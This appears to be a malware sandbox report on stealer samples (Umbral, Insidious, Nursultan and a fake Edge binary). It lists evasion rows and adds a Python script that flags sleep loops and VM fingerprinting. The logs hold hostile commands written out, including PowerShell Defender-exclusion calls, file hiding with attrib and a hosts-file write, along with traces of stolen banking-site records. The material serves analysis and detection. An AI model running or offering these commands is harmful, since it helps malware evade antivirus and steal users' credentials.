Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 922337203685477
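Three patterns in the rows above are worth pulling out when triaging a report like this one. The delay value 922337203685477 equals Int64.MaxValue in 100-nanosecond units expressed in milliseconds, so those rows are most likely relative waits with no practical end rather than a measured sleep. The Insidious.exe and Umbral.exe sequences start near 600000 and shrink by roughly 100 to 300 per call, which is what a "sleep until a deadline" loop looks like when the sandbox skips each individual sleep: every iteration recomputes a slightly smaller remaining time. The WMI queries against Win32_ComputerSystem, Win32_ComputerSystemProduct (UUID) and Win32_Processor (ProcessorId) are the classic virtualisation fingerprinting set. The following script is an added example, not part of the Joe Sandbox report or of the analysed samples: it parses lines in the report's `Source: <path>[ TID: n]<event>: <detail>` format, aggregates them per process and reports those indicators. The marker and WMI class lists, the thresholds, the millisecond reading of the sleep values and the treatment of hits in dropped data files are assumptions made for the example; the sample lines are constructed from rows in this section.

```python
"""Triage helper for Joe Sandbox evidence lines: sleep loops, WMI fingerprinting, VM strings."""
import re
from collections import defaultdict

# 922337203685477 == Int64.MaxValue / 10000: a 100-ns relative wait rendered in ms (assumed unit)
INFINITE_WAIT_MS = 922337203685477
LONG_SLEEP_MS = 30_000          # threshold the report itself compares against (">= -30000s")
COUNTDOWN_MAX_STEP_MS = 5_000   # successive delays shrinking by less than this look like a remaining-time loop

# WMI classes commonly used to fingerprint a VM or sandbox (list chosen for this example)
VM_WMI_CLASSES = ("Win32_ComputerSystem", "Win32_ComputerSystemProduct",
                  "Win32_Processor", "Win32_VideoController", "Win32_BIOS")
# Substrings that point at hypervisor guest tooling (example list; "Hyper-V" is omitted because
# mswsock.dll legitimately carries the string "Hyper-V RAW" for its socket provider)
VM_MARKERS = ("vmware", "vbox", "virtualbox", "qemu", "vmsrvc", "vmusrvc", "vmtoolsd")

EVENT_KEYWORDS = ("Thread sleep time:", "Thread sleep count:", "Thread delayed:", "WMI Queries:",
                  "Binary or memory string:", "File Volume queried:", "Last function:")
PROCESS_RE = re.compile(r"([^\\,]+?\.(?:exe|scr))")   # binary name inside a path, .N.dr tag or dump list
TID_RE = re.compile(r"\s*TID:\s*(\d+)$")


def parse_line(line):
    """Split one 'Source: <src>[ TID: n]<event>: <detail>' row into its fields, or None."""
    line = line.strip()
    if not line.startswith("Source:"):
        return None
    body = line[len("Source:"):].strip()
    for kw in EVENT_KEYWORDS:
        idx = body.find(kw)
        if idx == -1:
            continue
        source, detail = body[:idx].strip(), body[idx + len(kw):].strip()
        tid = None
        m = TID_RE.search(source)
        if m:
            tid, source = int(m.group(1)), source[:m.start()].strip()
        return {"source": source, "tid": tid, "event": kw.rstrip(":"), "detail": detail}
    return None


def process_name(source):
    """Reduce a path, dropped-file tag or memory-dump list to the originating binary's name."""
    m = PROCESS_RE.search(source)
    return m.group(1) if m else source


def delay_ms(ev):
    """Magnitude of the delay in a sleep/delayed event (None for other event types)."""
    if ev["event"] in ("Thread sleep time", "Thread delayed"):
        m = re.search(r"-?(\d+)", ev["detail"])
        return int(m.group(1)) if m else None
    return None


def longest_countdown(delays):
    """Longest run of delays that shrink by small steps: the trace of a sleep-until-deadline
    loop whose individual sleeps are being skipped by the sandbox."""
    if not delays:
        return 0
    best = run = 1
    for prev, cur in zip(delays, delays[1:]):
        run = run + 1 if 0 < prev - cur < COUNTDOWN_MAX_STEP_MS else 1
        best = max(best, run)
    return best


def analyse(lines):
    """Aggregate evidence per process and return the evasion indicators found for each."""
    delays, infinite = defaultdict(list), defaultdict(int)
    wmi, strings = defaultdict(list), defaultdict(list)
    for raw in lines:
        ev = parse_line(raw)
        if ev is None:
            continue
        proc = process_name(ev["source"])
        d = delay_ms(ev)
        if d == INFINITE_WAIT_MS:
            infinite[proc] += 1
        elif d is not None:
            delays[proc].append(d)
        elif ev["event"] == "WMI Queries" and any(c.lower() in ev["detail"].lower() for c in VM_WMI_CLASSES):
            wmi[proc].append(ev["detail"])
        elif ev["event"] == "Binary or memory string":
            # Count hits only in executables and memory dumps: a harvested browser database
            # (tmp28E5.tmp.dat) carries the sandbox host name and is noise for this purpose.
            if PROCESS_RE.search(ev["source"]) and any(mk in ev["detail"].lower() for mk in VM_MARKERS):
                strings[proc].append(ev["detail"])
    report = {}
    for proc in set(delays) | set(infinite) | set(wmi) | set(strings):
        fin = delays[proc]
        report[proc] = {
            "long_sleep_ms": max(fin) if fin and max(fin) >= LONG_SLEEP_MS else 0,
            "infinite_waits": infinite[proc],
            "countdown_steps": longest_countdown(fin),
            "vm_wmi_queries": wmi[proc],
            "vm_strings": strings[proc],
        }
    return report


SAMPLE_LINES = [  # constructed from rows in this section of the report
    r"Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7552Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 600000",
    r"Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 599874",
    r"Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 599765",
    r"Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 599619",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184Thread sleep count: 6566 > 30",
    r"Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem",
    r"Source: C:\Users\user\AppData\Local\Temp\Insidious.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor",
    r"Source: C:\Windows\System32\conhost.exeLast function: Thread delayed",
    r"Source: Umbral.exe.4.drBinary or memory string: vboxservice",
    r"Source: Microsoft Edge.exe.0.drBinary or memory string: vmware",
    r"Source: tmp28E5.tmp.dat.11.drBinary or memory string: discord.comVMware20,11696428655f",
]

if __name__ == "__main__":
    for proc, indicators in sorted(analyse(SAMPLE_LINES).items()):
        print(proc, indicators)
```

Run against the full evidence list, the countdown length is the more useful number than any single delay: a run of dozens of shrinking values for one process means the sample was stalling on wall-clock time and the sandbox's sleep skipping is what made the rest of the report possible. The string hits are filtered to executables and memory dumps on purpose; the "VMware20,1..." suffixes in tmp28E5.tmp.dat are the analysis machine's name inside stolen browser records, which says something about what was exfiltrated but nothing about evasion.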
Source: Umbral.exe.4.dr | Binary or memory string: vboxservice
Source: Nursultan.exe, 0000003B.00000002.2225928344.0000000000A07000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yQ
Source: tmp28E5.tmp.dat.11.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: tmp28E5.tmp.dat.11.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: tmp28E5.tmp.dat.11.dr | Binary or memory string: global block list test formVMware20,11696428655
Source: Umbral.exe.4.dr | Binary or memory string: vmsrvc
Source: tmp28E5.tmp.dat.11.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: tmp28E5.tmp.dat.11.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 00000004.00000002.2105694869.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 0000000A.00000002.2130667385.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E46000.00000004.00000800.00020000.00000000.sdmp, uOWQK.scr.14.dr, Umbral.exe.4.dr | Binary or memory string: qemu-ga
Source: tmp28E5.tmp.dat.11.dr | Binary or memory string: AMC password management pageVMware20,11696428655
Source: tmp28E5.tmp.dat.11.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Microsoft Edge.exe.0.dr | Binary or memory string: vmware
Source: tmp28E5.tmp.dat.11.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: tmp28E5.tmp.dat.11.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Nursultan2.exe, 00000019.00000002.2159590336.0000000000718000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
Source: tmp28E5.tmp.dat.11.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 00000004.00000002.2105694869.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 0000000A.00000002.2130667385.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E46000.00000004.00000800.00020000.00000000.sdmp, uOWQK.scr.14.dr, Umbral.exe.4.dr | Binary or memory string: vmusrvc
Source: tmp28E5.tmp.dat.11.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: tmp28E5.tmp.dat.11.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E46000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmwareservice
Source: tmp28E5.tmp.dat.11.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: tmp28E5.tmp.dat.11.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: tmp28E5.tmp.dat.11.dr | Binary or memory string: discord.comVMware20,11696428655f
Source: Umbral.exe.4.dr | Binary or memory string: vmwareuser
Source: tmp28E5.tmp.dat.11.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Insidious.exe, 0000000B.00000002.2243166969.000002452AD18000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(}=$
Source: tmp28E5.tmp.dat.11.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: tmp28E5.tmp.dat.11.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Nursultan.exe, 0000001C.00000002.2165170915.0000000001567000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\NRo
Source: Microsoft Edge.exe, 00000003.00000002.3341120459.000000001BDC0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
Source: Umbral.exe.4.dr | Binary or memory string: vmwaretray
Source: tmp28E5.tmp.dat.11.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                            Source: Umbral.exe, 0000000E.00000002.2585825077.000001DCB41E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: Nursultan.exe, 0000001C.00000002.2176831345.000000001C000000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_CD04&
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: outlook.office.comVMware20,11696428655s
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                            Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 00000004.00000002.2105694869.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 0000000A.00000002.2130667385.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E46000.00000004.00000800.00020000.00000000.sdmp, uOWQK.scr.14.dr, Umbral.exe.4.drBinary or memory string: vboxtray
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: dev.azure.comVMware20,11696428655j
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                            Source: Umbral.exe.4.drBinary or memory string: vmwareservice+discordtokenprotector
                            Source: Umbral.exe.4.drBinary or memory string: vmtoolsd
                            Source: Nursultan2.exe, 00000004.00000002.2102783475.0000000001178000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                            Source: Nursultan2.exe, 0000003A.00000002.2250754170.000000001B730000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Code function: 3_2_00007FF848E57A81 CheckRemoteDebuggerPresent,3_2_00007FF848E57A81
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\Nursultan.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe'
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Umbral.exe'
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe'
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Umbral.exe'
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe'
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
Source: C:\Users\user\Desktop\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
Source: C:\Users\user\Desktop\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe'
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Process created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe"
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mode.com mode con: cols=103 lines=21
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe"
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\AppData\Local\Temp\Umbral.exe"
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Umbral.exe'
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mode.com mode con: cols=103 lines=21
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe"
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe"
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
